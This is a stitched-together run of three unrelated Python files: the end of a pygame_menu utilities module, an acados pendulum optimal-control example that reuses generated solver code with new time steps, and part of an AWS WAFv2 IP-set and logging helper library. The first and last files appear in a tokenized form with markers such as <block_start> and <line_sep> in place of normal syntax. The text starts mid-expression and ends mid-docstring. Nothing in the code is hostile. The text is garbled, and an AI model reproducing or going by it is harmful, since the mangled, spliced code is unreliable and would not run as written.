255) min(max(a[2]+(rate[2]<times>(col-x1)) 0) 255))<line_sep>fn_line(surface color (col y1) (col y2))<block_end><block_end><block_end><def_stmt>format_color color:Union[ColorInputType Any] warn_if_invalid:bool=<true><arrow>Union[ColorType Any]<block_start>""" Format color from string, int, or tuple to tuple type. Available formats: - Color name str: name of the color to use, e.g. 
``"red"`` (all the supported name strings can be found in the colordict module, see https://github.com/pygame/pygame/blob/main/src_py/colordict.py) - HTML color format str: ``"#rrggbbaa"`` or ``"#rrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided - Hex number str: ``"0xrrggbbaa"`` or ``"0xrrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided - int: int value of the color to use, using hex numbers can make this parameter more readable, e.g. ``0xrrggbbaa``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, note that the aa (alpha) value is not optional for the int format and must be provided - tuple/list of int color values: ``(R, G, B, A)`` or ``(R, G, B)``, where R, G, B, and A are int values in the range of ``0`` to ``255`` inclusive, the A (alpha) value defaults to ``255`` (opaque) if not provided :param color: Color to format. 
If format is valid returns the same input value :param warn_if_invalid: If ``True`` warns if the color is invalid :return: Color in (r, g, b, a) format """<if_stmt><not>isinstance(color ColorInputInstance)<block_start><return>color<block_end><if_stmt><not>isinstance(color pygame.Color)<block_start><try_stmt><block_start><if_stmt>isinstance(color VectorInstance)<and>3<le>len(color)<le>4<block_start><if_stmt>PYGAME_V2<block_start><for_stmt>j color<block_start><if_stmt><not>isinstance(j int)<block_start><raise>ValueError('color cannot contain floating point values')<block_end><block_end><block_end>c=pygame.Color(*color)<block_end><else_stmt><block_start>c=pygame.Color(color)<block_end><block_end><except_stmt>ValueError<block_start><if_stmt>warn_if_invalid<block_start>warn(f'invalid color value "{color}"')<block_end><else_stmt><block_start><raise><block_end><return>color<block_end><block_end><else_stmt><block_start>c=color<block_end><return>c.r c.g c.b c.a<block_end><def_stmt>get_cursor <arrow>CursorInputType<block_start>""" Return the pygame cursor object. :return: Cursor object """<try_stmt><block_start><return>pygame.mouse.get_cursor()<block_end><except_stmt>TypeError<as>e<block_start>warn(str(e))<block_end><return><none><block_end><def_stmt>get_finger_pos menu:'pygame_menu.Menu' event:EventType<arrow>Tuple2IntType<block_start>""" Return the position from finger (or mouse) event on x-axis and y-axis (x, y). 
:param menu: Menu object for relative positioning in finger events :param event: Pygame event object :return: Position on x-axis and y-axis (x, y) in px """<if_stmt>event.type<in>(FINGERDOWN FINGERMOTION FINGERUP)<block_start><assert_stmt>menu<is><not><none> 'menu reference cannot be none while using finger position'<line_sep>display_size=menu.get_window_size()<line_sep>finger_pos=(int(event.x<times>display_size[0]) int(event.y<times>display_size[1]))<line_sep><return>finger_pos<block_end><return>event.pos<block_end><def_stmt>is_callable func:Any<arrow>bool<block_start>""" Return ``True`` if ``func`` is callable. :param func: Function object :return: ``True`` if function """<line_sep># noinspection PyTypeChecker <return>isinstance(func (types.FunctionType types.BuiltinFunctionType types.MethodType functools.partial))<block_end><def_stmt>load_pygame_image_file image_path:str **kwargs<arrow>'pygame.Surface'<block_start>""" Loads an image and returns a surface. :param image_path: Image file :param kwargs: Optional keyword arguments :return: Surface """<line_sep># Try to load the image <try_stmt><block_start><if_stmt>'test'<in>kwargs.keys()<block_start><raise>pygame.error('File is not a Windows BMP file')<block_end>surface=pygame.image.load(image_path)<block_end><except_stmt>pygame.error<as>exc# Check if file is not a windows file <block_start><if_stmt>str(exc)<eq>'File is not a Windows BMP file'<block_start>pil_invalid_exception=Exception<line_sep># Check if Pillow exists <try_stmt># noinspection PyPackageRequirements <block_start><import_from_stmt>PIL Image UnidentifiedImageError<line_sep>pil_invalid_exception=UnidentifiedImageError<line_sep>img_pil=Image.open(image_path)<line_sep>surface=pygame.image.fromstring(img_pil.tobytes() img_pil.size img_pil.mode).convert()<block_end><except_stmt>(ModuleNotFoundError ImportError)<block_start>warn(f'Image file "{image_path}" could not be loaded, as pygame.error '<concat>f'is raised. 
To avoid this issue install the Pillow library')<line_sep><raise><block_end><except_stmt>pil_invalid_exception<block_start>warn(f'The image "{image_path}" could not be loaded using Pillow')<line_sep><raise><block_end><block_end><else_stmt><block_start><raise><block_end><block_end><return>surface<block_end><def_stmt>make_surface width:NumberType height:NumberType alpha:bool=<false> fill_color:Optional[ColorInputType]=<none><arrow>'pygame.Surface'<block_start>""" Creates a pygame surface object. :param width: Surface width :param height: Surface height :param alpha: Enable alpha channel on surface :param fill_color: Fill surface with a certain color :return: Pygame surface """<assert_stmt>isinstance(width NumberInstance)<assert_stmt>isinstance(height NumberInstance)<assert_stmt>isinstance(alpha bool)<assert_stmt>width<ge>0<and>height<ge>0 'surface width and height must be equal or greater than zero'<line_sep>surface=pygame.Surface((int(width) int(height)) pygame.SRCALPHA 32)# lgtm [py/call/wrong-arguments] <if_stmt>alpha# noinspection PyArgumentList <block_start>surface=pygame.Surface.convert_alpha(surface)<block_end><if_stmt>fill_color<is><not><none><block_start>fill_color=assert_color(fill_color)<line_sep>surface.fill(fill_color)<block_end><return>surface<block_end><def_stmt>mouse_motion_current_mouse_position <arrow>EventType<block_start>""" Return a pygame event type MOUSEMOTION in the current mouse position. :return: Event """<line_sep>x,y=pygame.mouse.get_pos()<line_sep><return>pygame.event.Event(pygame.MOUSEMOTION {'pos':(int(x) int(y))})<block_end><def_stmt>parse_padding padding:PaddingType<arrow>Tuple4IntType<block_start>""" Get the padding value from tuple. 
- If an integer or float is provided: top, right, bottom and left values will be the same - If 2-item tuple is provided: top and bottom takes the first value, left and right the second - If 3-item tuple is provided: top will take the first value, left and right the second, and bottom the third - If 4-item tuple is provided: padding will be (top, right, bottom, left) .. note:: See `CSS W3Schools <https://www.w3schools.com/css/css_padding.asp>`_ for more info about padding. :param padding: Can be a single number, or a tuple of 2, 3 or 4 elements following CSS style :return: Padding value, (top, right, bottom, left), in px """<if_stmt>padding<is><false><or><none><block_start>padding=0<block_end><assert_stmt>isinstance(padding PaddingInstance)<if_stmt>isinstance(padding NumberInstance)<block_start><assert_stmt>padding<ge>0 'padding cannot be a negative number'<line_sep><return>int(padding) int(padding) int(padding) int(padding)<block_end><else_stmt><block_start><assert_stmt>1<le>len(padding)<le>4 'padding must be a tuple of 2, 3 or 4 elements'<for_stmt>i range(len(padding))<block_start><assert_stmt>isinstance(padding[i] NumberInstance) 'all padding elements must be integers or floats'<assert_stmt>padding[i]<ge>0 'all padding elements must be equal or greater than zero'<block_end><if_stmt>len(padding)<eq>1<block_start><return>int(padding[0]) int(padding[0]) int(padding[0]) int(padding[0])<block_end><elif_stmt>len(padding)<eq>2<block_start><return>int(padding[0]) int(padding[1]) int(padding[0]) int(padding[1])<block_end><elif_stmt>len(padding)<eq>3<block_start><return>int(padding[0]) int(padding[1]) int(padding[2]) int(padding[1])<block_end><else_stmt><block_start><return>int(padding[0]) int(padding[1]) int(padding[2]) int(padding[3])<block_end><block_end><block_end><def_stmt>print_menu_widget_structure widgets:List['pygame_menu.widgets.Widget'] index:int<arrow><none><block_start>""" Test printing widgets order. .. 
note:: - Φ Floating status - ⇇ Selected - !▲ Widget is not appended to current menu - ╳ Widget is hidden - ∑ Scrollable frame sizing - β Widget is not selectable - {x,y} Widget *column, row* position - <x,y> Frame indices (min, max) :param widgets: Menu widgets list :param index: Menu index :return: None """<line_sep>indx=0<line_sep>current_depth=0<line_sep>depth_widths={}<line_sep>c=TerminalColors<def_stmt>close_frames depth:int<arrow><none><block_start>""" Close frames up to current depth. :param depth: Depth to close :return: None """<line_sep>d=current_depth-depth<for_stmt>i range(d)<block_start>j=depth+d-(i+1)# Current depth line=f'· {"│ "<times>j}└{"┄"<times>3}'# * depth_widths[j] print(c.BRIGHT_WHITE+line.ljust(0 '━')+c.ENDC)<block_end><block_end># 80 also work non_menu_frame_widgets:Dict[int List['pygame_menu.widgets.Widget']]={}<def_stmt>process_non_menu_frame w_indx:int<arrow><none><block_start>""" Print non-menu frames list. :param w_indx: Current iteration index to print widgets :return: None """<for_stmt>nmi list(non_menu_frame_widgets.keys())<block_start><if_stmt>nmi<eq>w_indx<block_start>v=non_menu_frame_widgets[nmi]<for_stmt>v_wid v<block_start>print(c.BRIGHT_WHITE+'· '+'│ '<times>v_wid.get_frame_depth()+c.ENDC+widget_terminal_title(v_wid))<block_end><del_stmt>non_menu_frame_widgets[nmi]<block_end><block_end><block_end><for_stmt>w widgets<block_start>w_depth=w.get_frame_depth()<line_sep>close_frames(w.get_frame_depth())<line_sep>title=widget_terminal_title(w indx index)<line_sep>print('{0}{1}{2}'.format(str(indx).ljust(3) ' '+c.BRIGHT_WHITE+'│ '<times>w_depth+c.ENDC title))<if_stmt>w_depth<not><in>depth_widths.keys()<block_start>depth_widths[w_depth]=0<block_end># depth_widths[w_depth] = max(int(len(title) * 1.2) + 3, depth_widths[w_depth]) depth_widths[w_depth]=len(title)-2<line_sep>current_depth=w.get_frame_depth()<line_sep>process_non_menu_frame(indx)<line_sep>jw=widgets[0]<try_stmt><block_start><if_stmt>isinstance(w pygame_menu.widgets.Frame)# 
Print ordered non-menu widgets <block_start>current_depth<augadd>1<line_sep>prev_indx=indx<for_stmt>jw w.get_widgets(unpack_subframes=<false>)<block_start><if_stmt>jw.get_menu()<is><none><or>jw<not><in>widgets<block_start><if_stmt>prev_indx<not><in>non_menu_frame_widgets.keys()<block_start>non_menu_frame_widgets[prev_indx]=[]<block_end>non_menu_frame_widgets[prev_indx].append(jw)<block_end><else_stmt><block_start>prev_indx=widgets.index(jw)<block_end><block_end><block_end><block_end><except_stmt>ValueError<as>e<block_start>print(f'[ERROR] while requesting widget {jw.get_class_id()}')<line_sep>warn(str(e))<block_end>indx<augadd>1<block_end>process_non_menu_frame(indx)<line_sep>close_frames(0)<block_end><def_stmt>set_pygame_cursor cursor:CursorInputType<arrow><none><block_start>""" Set pygame cursor. :param cursor: Cursor object :return: None """<try_stmt><block_start><if_stmt>cursor<is><not><none># noinspection PyArgumentList <block_start>pygame.mouse.set_cursor(cursor)<block_end><block_end><except_stmt>(pygame.error TypeError)<block_start><if_stmt>PYGAME_V2<block_start>warn(f'could not establish widget cursor, invalid value {cursor}')<block_end><block_end><block_end><def_stmt>uuid4 short:bool=<false><arrow>str<block_start>""" Create custom version of uuid4. :param short: If ``True`` only returns the first 8 chars of the uuid, else, 18 :return: UUID of 18 chars """<line_sep><return>str(uuid.uuid4())[:18<if><not>short<else>8]<block_end><def_stmt>warn message:str print_stack:bool=<true><arrow><none><block_start>""" Warnings warn method. 
:param message: Message to warn about :param print_stack: Print stack trace of the call :return: None """<assert_stmt>isinstance(message str)<line_sep># noinspection PyUnresolvedReferences,PyProtectedMember frame=sys._getframe().f_back<line_sep># frame_info = inspect.getframeinfo(frame) # Traceback(filename, lineno, function, code_context, index) # Check if message in dict msg_hash=hash(message)<line_sep>msg_in_hash=<false><try_stmt><block_start>msg_in_hash=WARNINGS_LAST_MESSAGES[msg_hash]<block_end><except_stmt>KeyError<block_start><pass><block_end><if_stmt><not>msg_in_hash<and>print_stack<block_start>traceback.print_stack(frame limit=5)<line_sep>WARNINGS_LAST_MESSAGES[msg_hash]=<true><block_end># warnings.showwarning(message, UserWarning, frame_info[0], frame_info[1]) warnings.warn(message stacklevel=2)<block_end><def_stmt>widget_terminal_title widget:'pygame_menu.widgets.Widget' widget_index:int=-1 current_index:int=-1<arrow>str<block_start>""" Return widget title to be printed on terminals. 
:param widget: Widget to get title from :param widget_index: Widget index :param current_index: Menu index :return: Widget title """<line_sep>w_class_id=TerminalColors.BOLD+widget.get_class_id()+TerminalColors.ENDC<if_stmt>isinstance(widget pygame_menu.widgets.Frame)<block_start>w_title=TerminalColors.BRIGHT_WHITE+'┌━'+TerminalColors.ENDC<line_sep>w_title<augadd>f'{0} - {3}[{1},{2},'.format(w_class_id *widget.get_indices() TerminalColors.LGREEN)<if_stmt>widget.horizontal<block_start>w_title<augadd>'H] '<block_end><else_stmt><block_start>w_title<augadd>'V] '<block_end><if_stmt>widget.is_scrollable<block_start>wsz=widget.get_inner_size()<line_sep>wsm=widget.get_max_size()<line_sep>wsh=wsm[0]<if>wsm[0]<eq>wsz[0]<else>f'{wsm[0]}→{wsz[0]}'<line_sep>wsv=wsm[1]<if>wsm[1]<eq>wsz[1]<else>f'{wsm[1]}→{wsz[1]}'<line_sep>w_title<augadd>f'∑ [{wsh},{wsv}] '<block_end>w_title<augadd>TerminalColors.ENDC<block_end><else_stmt><block_start><if_stmt>widget.get_title()<ne>''<block_start>title_f=TerminalColors.UNDERLINE+widget.get_title()+TerminalColors.ENDC<line_sep>w_title=f'{w_class_id} - {title_f} - '<block_end><else_stmt><block_start>w_title=w_class_id+' - '<block_end><block_end># Column/Row position w_title<augadd>TerminalColors.INDIGO<line_sep>cr=widget.get_col_row_index()<line_sep>w_title<augadd>'{'+str(cr[0])+','+str(cr[1])+'}'<line_sep>w_title<augadd>TerminalColors.ENDC<line_sep># Add position w_title<augadd>TerminalColors.MAGENTA<line_sep>w_title<augadd>' ({0},{1})'.format(*widget.get_position())<line_sep>w_title<augadd>TerminalColors.ENDC<line_sep># Add size w_title<augadd>TerminalColors.BLUE<line_sep>w_title<augadd>' ({0},{1})'.format(*widget.get_size())<line_sep>w_title<augadd>TerminalColors.ENDC<line_sep># Add mods w_title<augadd>TerminalColors.CYAN<if_stmt>widget.is_floating()<block_start>w_title<augadd>' Φ'<block_end><if_stmt><not>widget.is_visible()<block_start>w_title<augadd>' ╳'<block_end><if_stmt><not>widget.is_selectable<block_start>w_title<augadd>' 
β'<block_end><if_stmt>widget.is_selected()<block_start>w_title<augadd>TerminalColors.BOLD+' ⟵'<if_stmt>current_index<ne>-1<and>current_index<ne>widget_index<block_start>w_title<augadd>f'! [{widget_index}->{current_index}]'<block_end><block_end><if_stmt>widget.get_menu()<is><none><block_start>w_title<augadd>' !▲'<block_end>w_title<augadd>TerminalColors.ENDC<line_sep><return>w_title<block_end><class_stmt>TerminalColors(object)<block_start>""" Terminal colors. See https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html. """<line_sep>BLUE='\u001b[38;5;27m'<line_sep>BOLD='\033[1m'<line_sep>BRIGHT_MAGENTA='\u001b[35;1m'<line_sep>BRIGHT_WHITE='\u001b[37;1m'<line_sep>CYAN='\u001b[36m'<line_sep>ENDC='\u001b[0m'<line_sep>GRAY='\u001b[30;1m'<line_sep>INDIGO='\u001b[38;5;129m'<line_sep>LGREEN='\u001b[38;5;150m'<line_sep>MAGENTA='\u001b[35m'<line_sep>RED='\u001b[31m'<line_sep>UNDERLINE='\033[4m'<block_end>
# Minimal example showing how to reuse the exported c-code with
# different time-steps.
#
# There are two use-cases demonstrated here. One use-case is to change
# the length of the time-stamp vector (this results in a different
# N). Another use-case is to change the final time but keep the number
# of shooting nodes identical. Reusing the exported code with varying
# N can be useful especially in a c-only application where the process
# of code-generation should only be done once.
#
# This example is an extension of the 'minimal_example_ocp.py' example.
#
# Copyright 2021 <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
import os
import sys

sys.path.insert(0, '../common')

from acados_template import AcadosOcp, AcadosOcpSolver
from pendulum_model import export_pendulum_ode_model
import numpy as np
import scipy.linalg
from utils import plot_pendulum

print('This example demonstrates 2 use-cases for reuse of the code export.')


def _solve_and_extract(solver, n_nodes, nx, nu):
    """Solve the OCP and return the (state, control) trajectories.

    :param solver: AcadosOcpSolver instance, already configured
    :param n_nodes: number of shooting nodes currently used by the solver
    :param nx: state dimension
    :param nu: control dimension
    :return: tuple ``(simX, simU)`` with shapes (n_nodes+1, nx) and (n_nodes, nu)
    :raises Exception: if the solver returns a nonzero status
    """
    status = solver.solve()
    if status != 0:
        solver.print_statistics()  # encapsulates: stat = solver.get_stats("statistics")
        raise Exception('acados returned status {}. Exiting.'.format(status))

    simX = np.ndarray((n_nodes + 1, nx))
    simU = np.ndarray((n_nodes, nu))
    for i in range(n_nodes):
        simX[i, :] = solver.get(i, "x")
        simU[i, :] = solver.get(i, "u")
    simX[n_nodes, :] = solver.get(n_nodes, "x")

    solver.print_statistics()  # encapsulates: stat = solver.get_stats("statistics")
    return simX, simU


# create ocp object to formulate the OCP
ocp = AcadosOcp()

# set model
model = export_pendulum_ode_model()
ocp.model = model

nx = model.x.size()[0]
nu = model.u.size()[0]
ny = nx + nu
ny_e = nx

# define the different options for the use-case demonstration
N0 = 20          # original number of shooting nodes
N12 = 15         # change the number of shooting nodes for use-cases 1 and 2
Tf_01 = 1.0      # original final time and for use-case 1
Tf_2 = Tf_01 * 0.7  # change final time for use-case 2 (but keep N identical)

# set dimensions
ocp.dims.N = N0

# set cost
Q = 2 * np.diag([1e3, 1e3, 1e-2, 1e-2])
R = 2 * np.diag([1e-2])

ocp.cost.W_e = Q
ocp.cost.W = scipy.linalg.block_diag(Q, R)

ocp.cost.cost_type = 'LINEAR_LS'
ocp.cost.cost_type_e = 'LINEAR_LS'

ocp.cost.Vx = np.zeros((ny, nx))
ocp.cost.Vx[:nx, :nx] = np.eye(nx)

Vu = np.zeros((ny, nu))
Vu[4, 0] = 1.0
ocp.cost.Vu = Vu

ocp.cost.Vx_e = np.eye(nx)

ocp.cost.yref = np.zeros((ny,))
ocp.cost.yref_e = np.zeros((ny_e,))

# set constraints
Fmax = 80
ocp.constraints.lbu = np.array([-Fmax])
ocp.constraints.ubu = np.array([+Fmax])
ocp.constraints.idxbu = np.array([0])

ocp.constraints.x0 = np.array([0.0, np.pi, 0.0, 0.0])

# set options
ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM'  # FULL_CONDENSING_QPOASES
# PARTIAL_CONDENSING_HPIPM, FULL_CONDENSING_QPOASES, FULL_CONDENSING_HPIPM,
# PARTIAL_CONDENSING_QPDUNES, PARTIAL_CONDENSING_OSQP
ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'
ocp.solver_options.integrator_type = 'ERK'
# ocp.solver_options.print_level = 1
ocp.solver_options.nlp_solver_type = 'SQP'  # SQP_RTI, SQP

# set prediction horizon
ocp.solver_options.tf = Tf_01

print(80 * '-')
print('generate code and compile...')
ocp_solver = AcadosOcpSolver(ocp, json_file='acados_ocp.json')

# --------------------------------------------------------------------------------
# 0) solve the problem defined here (original from code export), analog to
#    'minimal_example_ocp.py'
print(80 * '-')
print(f'solve original code with N = {N0} and Tf = {Tf_01} s:')
simX0, simU0 = _solve_and_extract(ocp_solver, N0, nx, nu)

# plot but don't halt
plot_pendulum(np.linspace(0, Tf_01, N0 + 1), Fmax, simU0, simX0, latexify=False,
              plt_show=False, X_true_label=f'original: N={N0}, Tf={Tf_01}')

# --------------------------------------------------------------------------------
# 1) now reuse the code but set a new time-steps vector, with a new number of
#    elements
dt1 = Tf_01 / N12
new_time_steps1 = np.tile(dt1, (N12,))  # Matlab's equivalent to repmat
time1 = np.hstack([0, np.cumsum(new_time_steps1)])

ocp_solver.set_new_time_steps(new_time_steps1)

print(80 * '-')
print(f'solve use-case 1 with N = {N12} (instead of {N0}) and Tf = {Tf_01} s:')
simX1, simU1 = _solve_and_extract(ocp_solver, N12, nx, nu)

plot_pendulum(time1, Fmax, simU1, simX1, latexify=False, plt_show=False,
              X_true_label=f'use-case 1: N={N12}')

# --------------------------------------------------------------------------------
# 2) reuse the code again, set a new time-steps vector, only with a different
#    final time
dt2 = Tf_2 / N12
new_time_steps2 = np.tile(dt2, (N12,))  # Matlab's equivalent to repmat
time2 = np.hstack([0, np.cumsum(new_time_steps2)])

ocp_solver.set_new_time_steps(new_time_steps2)

print(80 * '-')
print(f'solve use-case 2 with N = {N12} and Tf = {Tf_2} s (instead of {Tf_01} s):')
simX2, simU2 = _solve_and_extract(ocp_solver, N12, nx, nu)

plot_pendulum(time2, Fmax, simU2, simX2, latexify=False, plt_show=True,
              X_true_label=f'use-case 2: Tf={Tf_2} s')
###################################################################################################################### # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # # with the License. A copy of the License is located at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES # # OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions # # and limitations under the License. # ###################################################################################################################### # import boto3 # from botocore.config import Config <import_from_stmt>botocore.exceptions ClientError<import_from_stmt>ipaddress ip_address<import_from_stmt>backoff on_exception expo full_jitter<import_from_stmt>lib.boto3_util create_client<line_sep>API_CALL_NUM_RETRIES=5<line_sep>MAX_TIME=20<line_sep>client=create_client('wafv2')<class_stmt>WAFLIBv2(object)<block_start><def_stmt>__init__ self<block_start><return><block_end># Parse arn into ip_set_id <def_stmt>arn_to_id self arn<block_start><if_stmt>arn<eq><none><block_start><return><none><block_end>tmp=arn.split('/')<line_sep><return>tmp.pop()<block_end># Determine network version for source_ip <def_stmt>which_ip_version self log source_ip<block_start><if_stmt>source_ip<eq><none><block_start><return><none><block_end><try_stmt><block_start>source_ip=source_ip.strip()<line_sep>ip_type="IPV%s"%ip_address(source_ip).version<line_sep><return>ip_type<block_end><except_stmt>Exception<as>e<block_start>log.error("Source ip %s is not IPV4 or IPV6." 
str(source_ip))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Append correct cidr to source_ip <def_stmt>set_ip_cidr self log source_ip<block_start><if_stmt>source_ip<eq><none><block_start><return><none><block_end><try_stmt><block_start>source_ip=source_ip.strip()<line_sep>ip_type="IPV%s"%ip_address(source_ip).version<block_end><except_stmt>Exception<as>e<block_start>log.error("Source ip %s is not IPV4 or IPV6." str(source_ip))<line_sep>log.error(str(e))<line_sep><return><none><block_end>ip_class="32"<if>ip_type<eq>"IPV4"<else>"128"<line_sep><return>str(source_ip)+"/"+str(ip_class)<block_end># Retrieve IPSet given an ip_set_id <def_stmt>get_ip_set_by_id self log scope name ip_set_id<block_start><try_stmt><block_start>log.debug("[waflib:get_ip_set_by_id] Start")<line_sep>response=client.get_ip_set(Scope=scope Name=name Id=ip_set_id)<line_sep>log.debug("[waflib:get_ip_set_by_id] got ip set: \n{}.".format(response))<line_sep>log.debug("[waflib:get_ip_set_by_id] End")<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("[waflib:get_ip_set_by_id] Failed to get IPSet %s" str(ip_set_id))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Retrieve IPSet given an ip set arn @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>get_ip_set self log scope name arn<block_start><try_stmt><block_start>log.info("[waflib:get_ip_set] Start")<line_sep>ip_set_id=self.arn_to_id(arn)<line_sep>response=client.get_ip_set(Scope=scope Name=name Id=ip_set_id)<line_sep>log.info("[waflib:get_ip_set] End")<line_sep><return>response<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to get IPSet %s" str(ip_set_id))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Retrieve addresses based on ip_set_id @on_exception(expo client.exceptions.WAFInternalErrorException max_time=MAX_TIME)<def_stmt>get_addresses self log scope name 
arn<block_start><try_stmt><block_start>response=self.get_ip_set(log scope name arn)<line_sep>addresses=response["IPSet"]["Addresses"]<line_sep><return>addresses<block_end><except_stmt>Exception<as>e<block_start>log.error("Failed to get addresses for ARN %s" str(arn))<line_sep>log.error(str(e))<line_sep><return><none><block_end><block_end># Update addresses in an IPSet using ip set id @on_exception(expo client.exceptions.WAFOptimisticLockException max_time=MAX_TIME jitter=full_jitter max_tries=API_CALL_NUM_RETRIES)<def_stmt>update_ip_set_by_id self log scope name ip_set_id addresses lock_token description<block_start>log.debug("[waflib:update_ip_set_by_id] Start")<try_stmt><block_start>response=client.update_ip_set(Scope=scope Name=name Id=ip_set_id Addresses=addresses LockToken=lock_token Description=description)<line_sep>log.debug("[waflib:update_ip_set_by_id] update ip set response: \n{}.".format(response))<line_sep>log.debug("[waflib:update_ip_set_by_id] End")<line_sep><return>response<block_end># Get the latest ip set and retry updating api call when OptimisticLockException occurs <except_stmt>ClientError<as>ex<block_start>exception_type=ex.response['Error']['Code']<if_stmt>exception_type<in>['OptimisticLockException']<block_start>log.info("[waflib:update_ip_set_by_id] OptimisticLockException detected. 
Get the latest ip set and retry updating ip set.")<line_sep>ip_set=self.get_ip_set_by_id(log scope name ip_set_id)<line_sep>lock_token=ip_set['LockToken']<line_sep>response=client.update_ip_set(Scope=scope Name=name Id=ip_set_id Addresses=addresses LockToken=lock_token Description=description)<line_sep>log.debug("[waflib:update_ip_set_id] End")<line_sep><return>response<block_end><block_end><except_stmt>Exception<as>e<block_start>log.error(e)<line_sep>log.error("[waflib:update_ip_set_by_id] Failed to update IPSet: %s" str(ip_set_id))<line_sep><return><none><block_end><block_end># Update addresses in an IPSet using ip set arn @on_exception(expo client.exceptions.WAFOptimisticLockException max_time=MAX_TIME jitter=full_jitter max_tries=API_CALL_NUM_RETRIES)<def_stmt>update_ip_set self log scope name ip_set_arn addresses<block_start>log.info("[waflib:update_ip_set] Start")<if_stmt>(ip_set_arn<is><none><or>name<is><none>)<block_start>log.error("No IPSet found for: %s " str(ip_set_arn))<line_sep><return><none><block_end><try_stmt># convert from arn to ip_set_id <block_start>ip_set_id=self.arn_to_id(ip_set_arn)<line_sep># retrieve the ipset to get a locktoken ip_set=self.get_ip_set(log scope name ip_set_arn)<line_sep>lock_token=ip_set['LockToken']<line_sep>description=ip_set['IPSet']['Description']<line_sep>log.info("Updating IPSet with description: %s, lock token: %s" str(description) str(lock_token))<line_sep>response=client.update_ip_set(Scope=scope Name=name Description=description Id=ip_set_id Addresses=addresses LockToken=lock_token)<line_sep>new_ip_set=self.get_ip_set(log scope name ip_set_id)<line_sep>log.debug("[waflib:update_ip_set] update ip set response:\n{}".format(response))<line_sep>log.info("[waflib:update_ip_set] End")<line_sep><return>new_ip_set<block_end><except_stmt>Exception<as>e<block_start>log.error(e)<line_sep>log.error("Failed to update IPSet: %s" str(ip_set_id))<line_sep><return><none><block_end><block_end># Put Log Configuration for webacl 
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def put_logging_configuration(self, log, web_acl_arn, delivery_stream_arn):
    """Enable logging for a web ACL, shipping logs to the given Kinesis
    delivery stream.

    Returns the service response, or None on failure (the error is logged).
    """
    try:
        response = client.put_logging_configuration(
            LoggingConfiguration={
                'ResourceArn': web_acl_arn,
                'LogDestinationConfigs': [delivery_stream_arn]
            })
        return response
    except Exception as e:
        log.error("Failed to configure log for WebAcl: %s", str(web_acl_arn))
        log.error(str(e))
        return None

# Delete Log Configuration for webacl
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def delete_logging_configuration(self, log, web_acl_arn):
    """Disable logging for a web ACL.

    Returns the service response, or None on failure (the error is logged).
    """
    try:
        response = client.delete_logging_configuration(ResourceArn=web_acl_arn)
        return response
    except Exception as e:
        log.error("Failed to delete log for WebAcl: %s", str(web_acl_arn))
        log.error(str(e))
        return None

# List webacls
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def list_web_acls(self, log, scope):
    """List the web ACLs in the given scope.

    Returns the service response, or None on failure (the error is logged).
    """
    try:
        response = client.list_web_acls(Scope=scope)
        return response
    except Exception as e:
        # BUGFIX: log message said "WebAcld" instead of "WebAcls".
        log.error("Failed to list WebAcls in scope: %s", str(scope))
        log.error(str(e))
        return None

# log when retry is stopped
# def give_up_retry(self, log, e):
#     log.error("Giving up retry after %s times.", str(API_CALL_NUM_RETRIES))
#     log.error(e)

#################################################################
# Following functions only used for testing, not in WAF Solution
#################################################################
@on_exception(expo,
              (client.exceptions.WAFInternalErrorException,
               client.exceptions.WAFOptimisticLockException,
               client.exceptions.WAFLimitsExceededException),
              max_time=MAX_TIME)
def create_ip_set(self, log, scope, name, description, version, addresses):
    """Create an IPSet (test helper).

